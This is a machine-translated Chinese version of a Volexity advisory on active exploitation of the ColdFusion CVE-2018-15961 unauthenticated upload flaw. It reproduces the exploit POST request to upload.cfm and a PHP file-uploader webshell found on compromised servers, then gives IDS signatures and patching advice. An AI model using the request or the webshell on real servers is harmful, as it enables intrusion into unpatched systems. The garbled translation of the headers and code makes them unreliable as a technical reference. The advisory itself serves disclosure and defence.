如果您的企业正在运行ColdFusion Web版本，您可能需要检查您的服务器。 Volexity研究人员最近发现了Adobe ColdFusion CVE-2018-15961的漏洞。 Adobe已发布此漏洞的修补程序，尚未发布漏洞和PoC的详细信息。 在Volexity检测到的攻击活动中，中国的一个APT组织直接上传了中国厨刀webshell，以入侵易受攻击的ColdFusion服务器。因为目标服务器不升级adobe发布的更新补丁。漏洞CVE编号为CVE-2018-15961，受影响的版本包括4年内发布的所有版本，如ColdFusion 11，ColdFusion 2016和ColdFusion 2018。 Adobe的ColdFusion Web应用程序开发平台一直是APT组织攻击的目标。主流的ColdFusion包括WYSIWYG富文本编辑器CKEditor。在过去的ColdFusion版本中，Adobe打包了原始的FCKeditor。当Adobe决定用FCKeditor替换CKEditor时，意外地引入了一个新的非认证文件上传漏洞。此漏洞与2009年发现的FCKeditor非认证文件上载漏洞非常相似。 APT组织利用CVE-2018-15961漏洞 在Adobe发布漏洞安全更新两周后，Volexity发现了该漏洞的疯狂使用。它可以通过对upload.cfm文件的简单HTTP POST请求来使用。 upload.cfm是无限制的，不需要任何身份验证。以下是解释漏洞利用的POST请求： POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm?action=upload HTTP/1.1 接受: text/html，application/xhtml + xml，*/* 接受语言: en-US 用户代理: Mozilla/5.0（Windows NT 10.0; Win64; x64）AppleWebKit/537.36（KHTML，与Gecko一样）Chrome/70.0.3538.77 Safari/537.36 内容类型: multipart/form-data; boundary=———————— -5b12d3a3190134 Accept-Encoding: gzip，deflate 内容长度: 9308 主机:＆lt; hostname＆gt; Pragma:无缓存 连接:关闭 ———————— --5b12d3a3190134 ＆LT;删节＆GT; Volexity发现APT组织使用该漏洞上传中文菜刀的JSP版本，并在允许通过CKEditor上传之前在受感染的Web服务器上执行命令。相关的配置文件settings.cfm如下： ＆lt; cfset  settings.disfiles = “cfc，exe，php，asp，cfm，cfml”＆gt; CVE-2018-15961利用率 在使用CVE-2018-15961识别APT后，Volexity检查了许多具有网络连接的ColdFusion Web服务器。这些服务器隶属于不同的组织，包括教育机构，州政府和医学研究机构。这些网站都有尝试webshell上传的痕迹。在这些情况下，Volexity无法确认是否存在漏洞。但基于受感染服务器上的文件，研究人员认为，非APT成员的用户在9月11日之前已经识别出该漏洞。受感染的网站具有以下两个目录之一： /cf_scripts / /cf_scripts /脚本/AJAX/CKEditor的/插件/文件管理器/UPLOADEDFILES / 在大多数攻击实例中，这些文件的最后修改日期是6月2日或6月6日。许多网站上都提供了无法添加up.php.fla文件的旧版代码。fla扩展名不常用，可能是因为攻击者没有发现允许上传.jsp文件扩展名。 ＆LT; PHP $ files =  @ $ _ FILES [“files”]; 如果 （$ files [“name”] ！= “）  { $ fullpath =  $ _REQUEST [“path”]   $ files [“name”]; 如果 （move_uploaded_file（$ files ['tmp_name']，  $ fullpath））  { Echo “＆lt; h1＆gt;＆lt; a  href='$ fullpath'＆gt; OK-Click  here！＆lt;/a＆gt;＆lt;/h1＆gt;”; } } echo '＆lt; html＆gt;＆lt; head＆gt;＆lt; title＆gt;上传 文件.＆lt;/title＆gt;＆lt;/head＆gt;＆lt; body＆gt;＆lt; form  method=POST  enctype=“multipart/form -data  action=“”＆gt;＆lt; input  type=text  name=path＆gt;＆lt; input  type=“file”  name=“files”＆gt;＆lt; input  type=submit  value=“Up “＆gt;＆lt;/form＆gt;＆lt;/body＆gt;＆lt;/html＆gt;'; ？＆GT; 许多受影响的站点包含来自黑客组织TYPICAL IDIOT SECURITY的HTML索引文件。网页内容如下： 黑客 由  AnoaGhost  -  典型 白痴 安全 #together 笑 在 你的 安全 自  2k17＃ 我们 是:~•Khunerable  -   SPEEDY-03  -   PYS404  -   Mirav  -   Grac3  -   AnoaGhost  -   Jje  Incovers  -   Panataran  -   magelangGetar  -   Kersen.id• 黑客组织似乎来自印度尼西亚，其成员AnoaGhost与支持ISIS的黑客组织有关。 签名 以下入侵检测系统签名可用于检测CVE-2018-15961滥用： Suricata: 警报  http  $ EXTERNAL_NET 任何  - ＆gt;  $ HOME_NET 任何 （msg:“Volex  -   ColdFusion 未经验证的 上传 尝试 （upload.cfm）”; 流: to_server，已建立; 内容:“POST”;  http_method; 内容:“ upload.cfm？action=upload“;  nocase;  http_uri;  sid: 2018093003;） Snort: 警报  tcp  $ EXTERNAL_NET 任何  - ＆gt;  $ HOME_NET 任何 （msg:“Volex  -   ColdFusion 未经验证的 上传 尝试 （upload.cfm）”; 流: to_server，已建立; 内容:“POST”;  http_method; 内容:“ upload.cfm？action=upload“;  nocase;  http_uri;  sid: 2018093003;） 建议 如果ColdFusion服务器具有网络连接，则可以检查日志文件和目录中是否有可疑文件。如果找到其他日志记录或文件，则需要进一步分析。 Volexity建议用户尽快更新Adobe ColdFusion补丁。最好的方法是在管理员面包中配置补丁升级。下图是服务器更新 ＆gt; 更新 ＆gt; 设置默认设置：                          Volexity建议修改配置如下： 自动打开   检查更新选项 更改检查   每10天更新一次，从10天到1天，以便每天检查更新 配置正确的电子邮件以接收安全更新通知。   Volexity还建议所有ColdFusion管理员限制对IP白名单的访问，以减少攻击面。 总结一下 Adobe ColdFusion长期以来一直在利用远程攻击，是国家攻击者最喜欢的攻击目标。补丁管理是防止此类攻击的一种非常有效的方法。但是，Volexity建议用户检查使用的版本并尽快更新到最新版本。 https://www.volexity.com/blog/2018/11/08/active-exploitation-of-newly-patched-coldfusion-vulnerability-cve-2018-15961/